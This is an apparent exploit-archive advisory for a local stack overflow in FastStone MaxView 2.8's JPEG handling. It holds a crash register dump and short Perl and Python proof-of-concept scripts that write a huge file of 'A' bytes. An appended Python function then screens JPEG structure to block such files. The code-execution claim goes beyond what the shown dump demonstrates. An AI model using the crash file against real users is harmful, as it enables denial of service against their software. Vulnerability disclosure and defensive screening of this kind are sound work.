FastStone MaxView 2.8 Stack Overflow

Related Vulnerabilities: CVE-2014-8386  
Publish Date: 02 Jul 2015
#######################################################################
# Title    : FastStone MaxView 2.8 (.jpg) local Stack Overflow PoC
# Program  : FastStone MaxView
# Author   : Dr.3v1l
# Date     : 2015 01 July
# Website  : http://www.faststone.org
# Download : http://www.faststonesoft.net/DN/FSMaxViewSetup28.exe
# Version  : 2.8
# Type     : (.jpg File) local Stack Overflow PoC
#######################################################################
#
# 01. Vulnerability Information
# 
# Class: Buffer overflow [CWE-119]
# Impact: Code execution
# Remotely Exploitable: No
# Locally Exploitable: Yes
# CVE Name: CVE-2014-8386
# 
# 02. Technical Description / Proof of Concept Code
# 
# This vulnerability is caused by a stack buffer overflow when parsing
# the display properties parameter. A malicious third party could trigger
# execution of arbitrary code within the context of the application, or
# otherwise crash the whole application.
#
# EAX 54A30018 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# ECX 0013D2A8
# EDX 7767D370 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 0013D2A8
# EBP 0013D30C
# ESI 0013D328
# EDI 000007A4
# EIP 7767D370 ntdll.KiFastSystemCallRet
# C 0  ES 0023 32bit 0(FFFFFFFF)
# P 1  CS 001B 32bit 0(FFFFFFFF)
# A 0  SS 0023 32bit 0(FFFFFFFF)
# Z 1  DS 0023 32bit 0(FFFFFFFF)
# S 0  FS 003B 32bit 7FFDF000(4000)
# T 0  GS 0000 NULL
# D 0
# O 0  LastErr ERROR_SUCCESS (00000000)
# EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
# ST0 empty -??? FFFF 000000FF 00FF00FF
# ST1 empty 4.7021112344749837450e+18
# ST2 empty 4.7021112344749837450e+18
# ST3 empty 4.7021112344749837450e+18
# ST4 empty 4.7021112344749837450e+18
# ST5 empty 4.7021112344749837450e+18
# ST6 empty 4.7021112344749837450e+18
# ST7 empty 4.7021112344749837450e+18
#                3 2 1 0      E S P U O Z D I
# FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
# FCW 127F  Prec NEAR,53  Mask    1 1 1 1 1 1
# 
# ---------------------------------------------------------------------
# 
# PoC (PERL) :
# 
#   my $file="3v1l.jpg";
#   open(my $FILE, ">>$file") or die "Cannot open $file: $!";
#   print $FILE "\x41" x 250000000;
#   close($FILE);
#   print "$file has been created \n";
# 
# 
# PoC (PYTHON) :
# 
#   file="3v1l.jpg"
#   junk="\x41"*250000000
#   writeFile = open (file, "w")
#   writeFile.write(junk)
#   writeFile.close()
#
#######################################################################
#
# [+] Contact Me :
#
#     B.Devils.B@gmail.com
#     Twitter.com/Doctor_3v1l
#     Twitter.com/blackdevilsb0ys
#     Facebook.com/blackdevilsb0ys
#     Linkedin.com/in/hossein3v1l
#     Hossein Hezami - Black_Devils B0ys
#
#######################################################################
# Black_Devils B0ys - blackdevilsb0ys.ir
#######################################################################
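A defensive counterpart to the PoC above, as an added example that is not part of the original advisory: a structural pre-screen that a mail or upload gateway could run on files claiming to be JPEG before they reach a desktop viewer. The PoC file consists only of 0x41 bytes, so it carries no SOI marker and fails the first check. The function name, the size limit and the sample byte strings are assumptions made for illustration, and a file that passes is only well-formed at the marker level, not proven safe for any particular parser.

```python
import struct

MAX_BYTES = 64 * 1024 * 1024                        # assumed policy limit, not from the advisory
STANDALONE = {0x01} | set(range(0xD0, 0xD8))        # TEM, RST0-RST7: no length field
SOF = set(range(0xC0, 0xD0)) - {0xC4, 0xC8, 0xCC}   # frame headers (not DHT/JPG/DAC)

def screen_jpeg(data, max_bytes=MAX_BYTES):
    """Return (ok, reason) for bytes claimed to be a JPEG. Structural check only."""
    if len(data) > max_bytes:
        return False, "exceeds size limit"
    if data[:2] != b"\xff\xd8":
        return False, "missing SOI marker"
    pos, saw_frame = 2, False
    while pos < len(data):
        if data[pos] != 0xFF:
            return False, "no marker at offset %d" % pos
        while pos < len(data) and data[pos] == 0xFF:   # skip fill bytes
            pos += 1
        if pos >= len(data):
            return False, "truncated marker"
        marker = data[pos]
        pos += 1
        if marker in STANDALONE:
            continue
        if marker in (0x00, 0xD8, 0xD9):
            return False, "unexpected marker 0x%02X before scan" % marker
        if pos + 2 > len(data):
            return False, "truncated segment length"
        (seglen,) = struct.unpack(">H", data[pos:pos + 2])
        if seglen < 2 or pos + seglen > len(data):     # length must stay inside the file
            return False, "segment length out of bounds"
        pos += seglen
        if marker in SOF:
            saw_frame = True
        elif marker == 0xDA:                           # SOS: entropy-coded data follows
            if not saw_frame:
                return False, "scan before frame header"
            if data.find(b"\xff\xd9", pos) < 0:
                return False, "no EOI after scan"
            return True, "ok"
    return False, "no scan found"

# Constructed samples: the PoC's shape (only 0x41 bytes, shortened) and a minimal marker skeleton.
POC_SHAPED = b"\x41" * 4096
SKELETON = (b"\xff\xd8" + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00" + bytes(9)
            + b"\xff\xc0" + struct.pack(">H", 11) + bytes(9)
            + b"\xff\xda" + struct.pack(">H", 8) + bytes(6) + b"\x12\x34\xff\xd9")

if __name__ == "__main__":
    for name, blob in (("poc-shaped", POC_SHAPED), ("skeleton", SKELETON)):
        print(name, screen_jpeg(blob))
```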